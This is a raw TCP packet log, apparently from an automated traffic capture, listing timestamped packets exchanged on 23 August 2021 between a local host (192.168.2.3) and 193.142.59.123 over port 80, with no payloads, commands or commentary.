Aug 23, 2021 02:08:38.417603016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417608976 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417642117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417655945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417680025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417689085 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417721987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417735100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417759895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417761087 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417793989 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417798042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417833090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417834997 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417870998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417875051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417906046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417910099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417942047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417951107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417975903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417985916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418009996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418021917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418044090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418061972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418082952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418086052 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418118000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418126106 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418152094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418185949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418219090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418251038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418284893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418311119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418319941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418358088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418382883 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418394089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418422937 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418427944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418431044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418461084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418493986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418528080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.418560028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.418590069 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428302050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428353071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428390026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428426027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428463936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428472042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428489923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428498983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428540945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428553104 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428580999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428615093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428649902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428659916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428684950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428711891 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428719997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428755045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428778887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428791046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428833961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428873062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428889990 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428906918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428939104 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.428941965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428976059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.428997040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429009914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429044962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429058075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429078102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429140091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429177046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429210901 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429234028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429235935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429270029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429305077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429347992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429359913 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429383993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429408073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429418087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429464102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429506063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429523945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429542065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429554939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429584026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429619074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429652929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429680109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429687023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429713011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429722071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429764032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429802895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429830074 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429836035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429872990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429883003 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429908991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429919004 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.429941893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.429979086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430012941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430056095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430068970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430094957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430104971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430129051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430145979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430164099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430198908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430234909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430269957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430304050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430331945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430346012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430363894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430385113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430419922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430466890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430494070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430516958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430529118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430563927 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430615902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430668116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430722952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430751085 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430771112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430819035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430854082 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430865049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430912018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430951118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.430962086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.430999994 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431041002 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431052923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431101084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431180000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431216955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431231022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431242943 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431266069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431301117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431335926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431401014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431449890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431458950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431488991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431530952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431570053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431596994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431602955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431638956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431643963 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431683064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431718111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431754112 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431760073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431801081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431807041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.431860924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431916952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431967974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.431982040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.432019949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.434375048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449496031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449552059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449600935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449642897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449651957 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.449681044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449703932 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.449723005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449727058 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.449760914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449798107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449835062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449840069 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.449872971 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449882030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.449920893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.449964046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450001001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450020075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450037956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450056076 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450076103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450110912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450149059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450155020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450186014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450192928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450237036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450278997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450315952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450352907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450371027 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450391054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450412035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450427055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450464964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450469971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450503111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450547934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450548887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450592041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450628042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450643063 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450665951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450704098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450714111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450741053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450779915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450784922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450815916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450861931 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450862885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450903893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450922966 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.450941086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450980902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.450980902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.451019049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.451169014 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.462904930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.462964058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463002920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463049889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463077068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463092089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463126898 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463160992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463197947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463212967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463241100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463278055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463315010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463330030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463354111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463376999 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463391066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463438988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463479996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463491917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463516951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463530064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463555098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463594913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463632107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463640928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463669062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463680029 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463709116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463756084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463799000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463813066 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463836908 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463852882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463875055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463912964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463948965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.463963985 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.463985920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464001894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464024067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464071035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464112043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464123964 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464149952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464154005 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464188099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464227915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464266062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464272022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464304924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464308023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464342117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464389086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464431047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464436054 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464468002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464473963 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464507103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464545012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464580059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464589119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464617014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464618921 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464656115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464703083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464744091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464747906 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464781046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464783907 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464821100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464858055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464894056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464905977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464931965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.464945078 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.464968920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465015888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465056896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465066910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465094090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465102911 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465131998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465171099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465207100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465240955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465254068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465270996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465307951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465353966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465394974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465400934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.465431929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.465435028 CEST	49735	80	192.168.2.3	193.142.59.123
